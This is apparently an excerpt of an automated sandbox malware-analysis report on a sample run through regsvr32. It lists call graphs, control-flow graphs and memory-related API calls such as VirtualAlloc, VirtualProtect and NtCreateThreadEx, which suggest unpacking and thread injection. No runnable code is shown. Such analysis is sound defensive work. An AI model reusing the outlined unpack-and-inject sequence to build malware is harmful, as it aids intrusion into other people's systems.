                                                                                                                                                                                                                                                                                                                                                                  execution_graph 1770 3141c63 1771 3141c78 1770->1771 1774 3141000 VirtualAlloc 1771->1774 1773 3141c9b 1775 314108f 1774->1775 1775->1773 1776 3141ded 1777 3141fde VirtualProtect 1776->1777 1778 3141e6b 1776->1778 1778->1776 1778->1777 1779 4eb5554 1781 4eb55a0 1779->1781 1780 4eb58f0 1781->1780 1782 4eb5b31 VirtualProtect VirtualProtect 1781->1782 1783 4eb5aa8 VirtualAlloc 1781->1783 1784 4eb59f9 VirtualProtect 1781->1784 1786 4fee4c0 1781->1786 1782->1781 1783->1781 1784->1781 1788 4fee502 1786->1788 1787 4fee5e4 1787->1781 1788->1787 1790 4fe1d60 1788->1790 1791 4fe1db1 1790->1791 1792 4fe42fe 1791->1792 1797 4fe4cf0 1791->1797 1804 4fee1fe 1791->1804 1809 4fedf20 1791->1809 1813 4fe10a0 1791->1813 1792->1788 1798 4fe4d44 1797->1798 1799 4fedf04 1798->1799 1817 4fef9ba 1798->1817 1821 4fef260 1798->1821 1825 4fe1630 1798->1825 1829 4fe49f0 1798->1829 1799->1791 1807 4fee003 1804->1807 1808 4fee21b 1804->1808 1805 4fee007 VirtualAlloc 1805->1807 1806 4fee074 1806->1791 1807->1805 1807->1806 1808->1791 1810 4fedfa6 1809->1810 1810->1810 1811 4fee007 VirtualAlloc 1810->1811 1812 4fee074 1810->1812 1811->1810 1812->1791 1816 4fe1131 1813->1816 1814 4fe12e7 1814->1791 1815 4fe1205 VirtualFree 1815->1816 1816->1814 1816->1815 1818 4fef9bd NtCreateThreadEx 1817->1818 1820 4fef95c 1817->1820 1818->1820 1819 4fefa6a 1819->1798 1820->1817 1820->1819 1823 4fef31c 1821->1823 1822 4fef38b MapViewOfFile 1822->1823 1823->1822 1824 4fef3c3 1823->1824 1824->1798 1828 4fe16d6 1825->1828 1826 4fe1747 CreateFileMappingW 1826->1828 1827 4fe17ef 1827->1798 1828->1826 1828->1827 1832 4fe4adc 1829->1832 1830 4fe4bd3 1830->1798 1831 4fe4b36 FindCloseChangeNotification 1831->1832 1832->1830 1832->1831

                                                                                                                                                                                                                                                                                                                                                                  Callgraph

                                                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                                                  • Opacity -> Relevance
                                                                                                                                                                                                                                                                                                                                                                  • Disassembly available
                                                                                                                                                                                                                                                                                                                                                                  callgraph 0 Function_04FEE1FE 95 Function_04FE4314 0->95 1 Function_04EB18E8 2 Function_0314311E 3 Function_0314221F 4 Function_04FE4CF0 5 Function_04FE49F0 4->5 13 Function_04FE4CE0 4->13 30 Function_04FEF9BA 4->30 60 Function_04FEF260 4->60 75 Function_04FEEE34 4->75 78 Function_04FE1630 4->78 85 Function_04FEF229 4->85 94 Function_04FE1014 5->94 6 Function_03144005 7 Function_03141805 8 Function_04EB48FA 9 Function_03144007 10 Function_03141000 47 Function_03141B68 10->47 53 Function_03141192 10->53 68 Function_031418AC 10->68 96 Function_031412FA 10->96 11 Function_0314240A 12 Function_04FE18E0 14 Function_04EB4BF4 15 Function_03141734 16 Function_03141337 17 Function_03143133 18 Function_04FEF8D9 19 Function_04EB1EC4 19->19 49 Function_04EB1594 19->49 76 Function_04EB1120 19->76 20 Function_03141827 21 Function_04EB4BDC 22 Function_0314172D 23 Function_03141B2D 23->3 84 Function_031415C5 23->84 24 Function_04FEE4C0 61 Function_04FE1D60 24->61 25 Function_04FE45C0 26 Function_04FE1BC0 27 Function_04EB4BD4 28 Function_03141157 29 Function_04EB4BA8 31 Function_03142052 32 Function_04EB5BAC 33 Function_04EB5BA0 34 Function_03144058 35 Function_04EB44B9 36 Function_04FE1BA4 37 Function_04EB1EB0 37->19 37->49 37->76 38 Function_03142048 39 Function_04FE10A0 40 Function_04FE1BA0 41 Function_04EB1588 42 Function_03141165 43 Function_03141860 44 Function_03141C63 44->10 44->15 58 Function_03141282 44->58 45 Function_04EB4391 46 Function_04EB4A90 47->31 48 Function_04FEF780 50 Function_03143097 51 Function_03141597 51->3 52 Function_04EB1568 54 Function_04FEF774 55 Function_03141798 55->3 56 Function_03141598 56->3 57 Function_04FEF770 58->3 59 Function_04EB4277 61->0 61->4 61->36 61->39 61->54 86 Function_04FEDF20 61->86 104 Function_04FE1004 61->104 62 Function_04FE1360 63 Function_031415B6 64 Function_031417B9 65 Function_04FEEE50 66 Function_031423A4 67 Function_031418A5 69 Function_031427AC 70 Function_04EB4A52 71 Function_04EB5554 71->19 71->24 89 Function_04EB3134 71->89 72 Function_031424D6 73 Function_03141FD3 74 Function_031425DD 74->3 74->84 74->96 77 Function_031420D8 79 Function_04FE4330 80 Function_04FEF530 81 Function_04FEEE30 82 Function_031412DB 82->3 83 Function_031416C4 83->53 86->95 87 Function_04FE1020 88 Function_04FEF220 89->14 91 Function_04EB5408 89->91 90 Function_04EB5534 91->14 92 Function_04EB4E08 93 Function_04EB160C 97 Function_04FE1010 98 Function_04FE4310 99 Function_04EB1618 100 Function_031411E3 100->3 101 Function_04FEF909 102 Function_03141DED 102->53 103 Function_031430EE 105 Function_04FE1000

                                                                                                                                                                                                                                                                                                                                                                  Executed Functions

                                                                                                                                                                                                                                                                                                                                                                  Function 04EB5554 Relevance: 6.4, APIs: 4, Instructions: 417memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                                                  control_flow_graph 193 4eb5554-4eb559e 194 4eb55a4-4eb55b8 193->194 195 4eb55ba-4eb57ae 194->195 196 4eb55a0-4eb55a1 194->196 197 4eb57b5-4eb57bf 195->197 196->194 198 4eb58f0-4eb58fe 197->198 199 4eb57c5-4eb57cf 197->199 200 4eb57d5-4eb58d8 call 4eb1000 call 4fee4c0 199->200 201 4eb58e4-4eb58ee 199->201 210 4eb58db-4eb58df 200->210 201->198 202 4eb5901-4eb590a 201->202 204 4eb5a50-4eb5a5a 202->204 205 4eb5910-4eb5a3f call 4eb1ec4 call 4eb3134 * 3 call 4eb4fdc call 4eb1ec4 VirtualProtect call 4eb1ec4 202->205 207 4eb5a5c-4eb5a60 204->207 208 4eb5a65-4eb5a6f 204->208 234 4eb5a44-4eb5a4b 205->234 211 4eb5b21-4eb5b2b 207->211 208->211 212 4eb5a75-4eb5a7c 208->212 210->211 211->197 214 4eb5b31-4eb5b9a VirtualProtect * 2 211->214 215 4eb5a7e-4eb5a86 212->215 214->197 215->215 217 4eb5a88-4eb5af3 call 4eb1ec4 VirtualAlloc call 4eb3134 215->217 225 4eb5af8-4eb5b1d call 4eb1ec4 217->225 225->211 234->211
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • VirtualProtect.KERNELBASE(?,?,?,?), ref: 04EB5A24
                                                                                                                                                                                                                                                                                                                                                                  • VirtualAlloc.KERNELBASE(?,?,?,?), ref: 04EB5ACB
                                                                                                                                                                                                                                                                                                                                                                  • VirtualProtect.KERNELBASE(?,?,?,?), ref: 04EB5B4E
                                                                                                                                                                                                                                                                                                                                                                  • VirtualProtect.KERNELBASE(?,?,?,?), ref: 04EB5B6E
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.2444299072.0000000004EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04EB1000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_4eb1000_regsvr32.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Virtual$Protect$Alloc
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 2541858876-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 12afed25b5214265d0b16d22973800ec664d50b4f0a6e33e63a13b5b13dd3970
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 0fe9f005e2ab875997f3c764cc75610e13683795a99c994bf93c58f034bf591a
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 12afed25b5214265d0b16d22973800ec664d50b4f0a6e33e63a13b5b13dd3970
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EDF17376A053419FD725CF25C880ADBF7E7BFC8314F15C96EE5899B218DA30A8058B91
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 04FE49F0 Relevance: 1.7, APIs: 1, Instructions: 210COMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                                                  control_flow_graph 291 4fe49f0-4fe4ada 292 4fe4adc-4fe4aef 291->292 293 4fe4af1-4fe4b06 291->293 292->292 292->293 294 4fe4b0c-4fe4b24 293->294 295 4fe4bd3-4fe4be3 293->295 296 4fe4b2a-4fe4b34 294->296 297 4fe4b68-4fe4b72 296->297 298 4fe4b36-4fe4b66 FindCloseChangeNotification 296->298 300 4fe4b74-4fe4b7e 297->300 301 4fe4bc5-4fe4bc8 297->301 299 4fe4bcb-4fe4bcd 298->299 299->295 299->296 302 4fe4b80-4fe4b8a 300->302 303 4fe4bb1-4fe4bc3 300->303 301->299 304 4fe4b8c-4fe4b96 302->304 305 4fe4be6-4fe4cd0 call 4fe1014 302->305 303->299 304->299 306 4fe4b98-4fe4baf 304->306 305->299 306->299
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • FindCloseChangeNotification.KERNELBASE(?), ref: 04FE4B51
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.2444472029.0000000004FE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04FE1000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_4fe1000_regsvr32.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: ChangeCloseFindNotification
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 2591292051-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 8aed94ea8e68a994b4966f7c03ffbc6707aca2ee4073448b412743e3cd54105b
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: ff953afa869acbd37b8a42f4814b3feb368152042206d6a5ebb5bfcebf17dacf
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8aed94ea8e68a994b4966f7c03ffbc6707aca2ee4073448b412743e3cd54105b
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4981E377A187518FC314CE29D88166FB7E6BBC8314F2A492DE485DB354EB74F8068B81
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 04FEF260 Relevance: 1.7, APIs: 1, Instructions: 207fileCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                                                  control_flow_graph 311 4fef260-4fef31a 312 4fef33e-4fef378 311->312 313 4fef31c-4fef33c 311->313 314 4fef37f-4fef389 312->314 313->312 313->313 315 4fef38b-4fef3b5 MapViewOfFile 314->315 316 4fef3b7-4fef3c1 314->316 317 4fef41f-4fef429 315->317 318 4fef3d4-4fef3de 316->318 319 4fef3c3-4fef3d1 316->319 317->314 322 4fef42f-4fef52b 317->322 320 4fef3e6-4fef3f0 318->320 321 4fef3e0-4fef3e4 318->321 323 4fef3f2-4fef401 320->323 324 4fef403-4fef40d 320->324 321->317 322->314 323->317 324->317 325 4fef40f-4fef41b 324->325 325->317
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • MapViewOfFile.KERNELBASE(?,?,?,?,?), ref: 04FEF3AD
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.2444472029.0000000004FE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04FE1000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_4fe1000_regsvr32.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: FileView
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 3314676101-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: e411be61140cf6140402769dcfefc73969a8bc3da2ad4b028761c1c36376bbf0
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 44e9a8ae776f7768535d63f6d96782df613de0b434a8351df829197efdaca61e
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e411be61140cf6140402769dcfefc73969a8bc3da2ad4b028761c1c36376bbf0
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2481A4366187018FD718CF29C89056BB7E3BBC8314F15CA2DE5958B758DB34E906CB82
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 04FE1630 Relevance: 1.7, APIs: 1, Instructions: 192COMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                                                  control_flow_graph 328 4fe1630-4fe16d4 329 4fe16d6-4fe16d8 328->329 330 4fe1711-4fe1737 328->330 329->330 331 4fe16da 329->331 332 4fe173b-4fe1745 330->332 333 4fe16dc-4fe170f 331->333 334 4fe1747-4fe1783 CreateFileMappingW 332->334 335 4fe1785-4fe178f 332->335 333->330 333->333 336 4fe17dd-4fe17e7 334->336 337 4fe17a3-4fe17ad 335->337 338 4fe1791-4fe17a1 335->338 336->332 341 4fe17ed-4fe18d6 336->341 339 4fe17ef-4fe17fd 337->339 340 4fe17af-4fe17b9 337->340 338->336 343 4fe17bb-4fe17bf 340->343 344 4fe17c1-4fe17cb 340->344 341->332 343->336 344->336 345 4fe17cd-4fe17db 344->345 345->336
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • CreateFileMappingW.KERNELBASE(?,?,?,?,?,?), ref: 04FE177B
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.2444472029.0000000004FE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04FE1000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_4fe1000_regsvr32.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: CreateFileMapping
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 524692379-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 263bbeb91cb2ee51d5f2f800facd51010e18e08b1b7037345cde8f1270ab44f5
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 05f411554ac762b2a974b579e7dcd9eda0f12d3634ddfbc53e248bedb19a5744
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 263bbeb91cb2ee51d5f2f800facd51010e18e08b1b7037345cde8f1270ab44f5
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3E7191726086458FD714CE3AC98096BB7E3FBC4711F14CA2DF5958B398EB34A846CB42
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 04FEF9BA Relevance: 1.7, APIs: 1, Instructions: 168nativethreadCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                                                  control_flow_graph 348 4fef9ba-4fef9bb 349 4fef9bd-4fefa39 NtCreateThreadEx 348->349 350 4fefa3b-4fefa45 348->350 351 4fefa62-4fefa64 349->351 350->351 352 4fefa47-4fefa60 350->352 353 4fef95c-4fef966 351->353 354 4fefa6a-4fefa7d 351->354 352->351 355 4fef988-4fef992 353->355 356 4fef968-4fef983 353->356 357 4fef994-4fef99c 355->357 358 4fef9a1-4fef9ab 355->358 356->351 357->351 359 4fefa80-4fefb13 358->359 360 4fef9b1-4fef9b7 358->360 362 4fefb58-4fefbce 359->362 363 4fefb15 359->363 360->348 362->351 364 4fefb1d-4fefb4e 363->364 364->364 365 4fefb50-4fefb54 364->365 365->362
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • NtCreateThreadEx.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 04FEFA20
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.2444472029.0000000004FE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04FE1000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_4fe1000_regsvr32.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: CreateThread
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 2422867632-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: dc405aff4eb411600e472c4da323595254edf4c808644b335f1b96da61034660
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 43ad874e78d7b3adcb3f973b4811eb0750b519b8f5a5af3f53971252f5b76250
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: dc405aff4eb411600e472c4da323595254edf4c808644b335f1b96da61034660
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8F617E326183819FD724CF29C851A6FBBE3BBC9710F16891DE599DB290D730E906CB52
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 04FEE1FE Relevance: 1.5, APIs: 1, Instructions: 238memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                                                  control_flow_graph 367 4fee1fe-4fee219 368 4fee21b-4fee291 367->368 369 4fee1a6-4fee1d9 367->369 371 4fee2af-4fee300 368->371 372 4fee293 368->372 370 4fee003-4fee005 369->370 373 4fee007-4fee04e VirtualAlloc 370->373 374 4fee050-4fee05a 370->374 376 4fee304-4fee306 371->376 375 4fee295-4fee2ad 372->375 373->370 379 4fee05c-4fee066 374->379 380 4fee0c9-4fee0dc 374->380 375->371 375->375 377 4fee44c-4fee464 376->377 378 4fee30c-4fee313 376->378 377->376 381 4fee358-4fee362 378->381 382 4fee315-4fee353 378->382 383 4fee0bd-4fee0c4 379->383 384 4fee068-4fee072 379->384 380->370 387 4fee43f 381->387 388 4fee368-4fee372 381->388 397 4fee422-4fee426 382->397 383->370 385 4fee08a-4fee094 384->385 386 4fee074-4fee087 384->386 391 4fee096-4fee0a0 385->391 392 4fee0e1-4fee1d9 call 4fe4314 385->392 389 4fee443-4fee447 387->389 393 4fee374-4fee384 388->393 394 4fee385-4fee38e 388->394 389->376 391->370 398 4fee0a6-4fee0b8 391->398 392->370 395 4fee42b-4fee43d 394->395 396 4fee394-4fee39e 394->396 395->389 399 4fee469-4fee4b6 396->399 400 4fee3a4-4fee3ae 396->400 397->376 398->370 400->376 402 4fee3b4-4fee41e 400->402 402->397
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • VirtualAlloc.KERNELBASE(?,?,?,?), ref: 04FEE036
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.2444472029.0000000004FE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04FE1000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_4fe1000_regsvr32.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 4275171209-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 647da2b942333bcbcb27ca3ad03edced97bebc1f07ac82cd6b146165d75be7a8
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 474b49beb19143bf274cd9de485110fd3a28da50494fb08a67cff7f0a16eb9b6
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 647da2b942333bcbcb27ca3ad03edced97bebc1f07ac82cd6b146165d75be7a8
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D2A15A77A183418FC710CF29D48066AFBE2FFC8314F1A8959E8959B350D735E94ACB82
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 04FEDF20 Relevance: 1.4, APIs: 1, Instructions: 192memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                                                  control_flow_graph 408 4fedf20-4fedfa4 409 4fedfa6-4fedfcc 408->409 409->409 410 4fedfce-4fee000 409->410 411 4fee003-4fee005 410->411 412 4fee007-4fee04e VirtualAlloc 411->412 413 4fee050-4fee05a 411->413 412->411 414 4fee05c-4fee066 413->414 415 4fee0c9-4fee0dc 413->415 416 4fee0bd-4fee0c4 414->416 417 4fee068-4fee072 414->417 415->411 416->411 418 4fee08a-4fee094 417->418 419 4fee074-4fee087 417->419 420 4fee096-4fee0a0 418->420 421 4fee0e1-4fee1d9 call 4fe4314 418->421 420->411 422 4fee0a6-4fee0b8 420->422 421->411 422->411
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • VirtualAlloc.KERNELBASE(?,?,?,?), ref: 04FEE036
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.2444472029.0000000004FE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04FE1000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_4fe1000_regsvr32.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 4275171209-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 040db8f627d2f0da430c1fc926ac87043b9bb39a5eb0f799242a143fd185f7cd
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 8fd96a37a6556bed11bd6089f837bdcf066ad8bf8d09d290b07db6de6482cf06
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 040db8f627d2f0da430c1fc926ac87043b9bb39a5eb0f799242a143fd185f7cd
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 207170776187418FC320CF29D88069AB7E3BFC4314F658A18E5999B754DB35F906CB82
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 04FE10A0 Relevance: 1.4, APIs: 1, Instructions: 190COMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                                                  control_flow_graph 427 4fe10a0-4fe112f 428 4fe1160-4fe118c 427->428 429 4fe1131 427->429 431 4fe1190-4fe119a 428->431 430 4fe1133-4fe115e 429->430 430->428 430->430 432 4fe119c-4fe11ac 431->432 433 4fe11b1-4fe11bb 431->433 434 4fe12d5-4fe12df 432->434 435 4fe12e7-4fe12f5 433->435 436 4fe11c1-4fe11cb 433->436 434->431 437 4fe12e5-4fe1354 434->437 438 4fe11cd-4fe11df 436->438 439 4fe11e4-4fe11ee 436->439 437->431 438->434 441 4fe11f9-4fe1203 439->441 442 4fe11f0-4fe11f4 439->442 443 4fe1239-4fe1243 441->443 444 4fe1205-4fe1234 VirtualFree 441->444 442->434 443->434 445 4fe1249-4fe12d0 443->445 444->434 445->434
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • VirtualFree.KERNELBASE(?,?,?), ref: 04FE122C
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.2444472029.0000000004FE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04FE1000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_4fe1000_regsvr32.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: FreeVirtual
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 1263568516-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: de472bfbad0700a724fd77e042b9a7590b0bb9c13966180ede2c5d5add54b3f5
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 0a8f6625afc0b2df406e69103220e73853dcc4307aadbd1829797d74a4d3033a
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: de472bfbad0700a724fd77e042b9a7590b0bb9c13966180ede2c5d5add54b3f5
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E971C232A182008FD314CF6ACD8066FB7E7BBC4311F25CA2DE59597259DB74E846CB91
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 03141DED Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 93memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                                                  control_flow_graph 236 3141ded-3141e65 237 3141fde-314203d VirtualProtect 236->237 238 3141e6b-3141e93 236->238 239 3141f66-3141fce call 3141192 238->239 240 3141e99 238->240 239->237 240->236
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.2443758923.0000000003140000.00000040.00001000.00020000.00000000.sdmp, Offset: 03140000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
